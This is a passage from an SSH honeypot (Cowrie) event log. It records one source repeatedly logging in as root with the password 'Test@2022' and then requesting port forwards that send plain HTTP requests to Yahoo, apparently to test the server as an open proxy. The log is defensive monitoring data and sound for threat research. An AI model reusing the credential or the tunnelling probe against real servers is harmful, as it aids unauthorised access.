{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.656895Z","src_ip":"213.209.150.239","session":"5cb74cd2a34c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24701,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaa04cc17152","protocol":"ssh","message":"New connection: 213.209.150.239:24701 (1.2.3.4:22) [session: aaa04cc17152]","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.712559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.713313Z","src_ip":"213.209.150.239","session":"aaa04cc17152"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:53.770376Z","src_ip":"213.209.150.239","session":"aaa04cc17152"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.052387Z","src_ip":"213.209.150.239","session":"aaa04cc17152"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":16846,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:16846","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.109980Z","session":"aaa04cc17152"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.166964Z","src_ip":"213.209.150.239","session":"aaa04cc17152"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":16960,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16960","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.323032Z","session":"aaa04cc17152"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.379720Z","src_ip":"213.209.150.239","session":"aaa04cc17152"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.437532Z","src_ip":"213.209.150.239","session":"aaa04cc17152"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24754,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f3168148b81","protocol":"ssh","message":"New connection: 213.209.150.239:24754 (1.2.3.4:22) [session: 4f3168148b81]","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.493334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.494181Z","src_ip":"213.209.150.239","session":"4f3168148b81"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.551153Z","src_ip":"213.209.150.239","session":"4f3168148b81"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58710,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0ddd0767b13","protocol":"ssh","message":"New connection: 217.72.205.35:58710 (1.2.3.4:22) [session: d0ddd0767b13]","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.682860Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.684219Z","src_ip":"217.72.205.35","session":"d0ddd0767b13"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.833460Z","src_ip":"213.209.150.239","session":"4f3168148b81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":31274,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:31274","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.891753Z","session":"4f3168148b81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:54.948630Z","src_ip":"213.209.150.239","session":"4f3168148b81"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":12557,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12557","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.103154Z","session":"4f3168148b81"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.159713Z","src_ip":"213.209.150.239","session":"4f3168148b81"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.217074Z","src_ip":"213.209.150.239","session":"4f3168148b81"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24805,"dst_ip":"1.2.3.4","dst_port":22,"session":"4db0c01658b3","protocol":"ssh","message":"New connection: 213.209.150.239:24805 (1.2.3.4:22) [session: 4db0c01658b3]","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.263308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.273793Z","src_ip":"213.209.150.239","session":"4db0c01658b3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.310544Z","src_ip":"213.209.150.239","session":"4db0c01658b3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.545326Z","src_ip":"213.209.150.239","session":"4db0c01658b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":11360,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11360","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.593510Z","session":"4db0c01658b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.640671Z","src_ip":"213.209.150.239","session":"4db0c01658b3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":20198,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20198","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.785564Z","session":"4db0c01658b3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.832891Z","src_ip":"213.209.150.239","session":"4db0c01658b3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.881390Z","src_ip":"213.209.150.239","session":"4db0c01658b3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24841,"dst_ip":"1.2.3.4","dst_port":22,"session":"26b5ddf7fcfd","protocol":"ssh","message":"New connection: 213.209.150.239:24841 (1.2.3.4:22) [session: 26b5ddf7fcfd]","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.937368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.938442Z","src_ip":"213.209.150.239","session":"26b5ddf7fcfd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:55.995235Z","src_ip":"213.209.150.239","session":"26b5ddf7fcfd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.277513Z","src_ip":"213.209.150.239","session":"26b5ddf7fcfd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":12216,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:12216","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.335406Z","session":"26b5ddf7fcfd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.392289Z","src_ip":"213.209.150.239","session":"26b5ddf7fcfd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":20098,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:20098","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.547118Z","session":"26b5ddf7fcfd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.604027Z","src_ip":"213.209.150.239","session":"26b5ddf7fcfd"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.661613Z","src_ip":"213.209.150.239","session":"26b5ddf7fcfd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24902,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ce9b101979e","protocol":"ssh","message":"New connection: 213.209.150.239:24902 (1.2.3.4:22) [session: 0ce9b101979e]","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.707806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.716948Z","src_ip":"213.209.150.239","session":"0ce9b101979e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.755533Z","src_ip":"213.209.150.239","session":"0ce9b101979e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:56.991066Z","src_ip":"213.209.150.239","session":"0ce9b101979e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":30405,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:30405","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.039328Z","session":"0ce9b101979e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.086771Z","src_ip":"213.209.150.239","session":"0ce9b101979e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":12834,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12834","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.221849Z","session":"0ce9b101979e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.269013Z","src_ip":"213.209.150.239","session":"0ce9b101979e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.316850Z","src_ip":"213.209.150.239","session":"0ce9b101979e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24960,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1ea3303e96a","protocol":"ssh","message":"New connection: 213.209.150.239:24960 (1.2.3.4:22) [session: e1ea3303e96a]","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.372425Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:57.373387Z","src_ip":"213.209.150.239","session":"e1ea3303e96a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-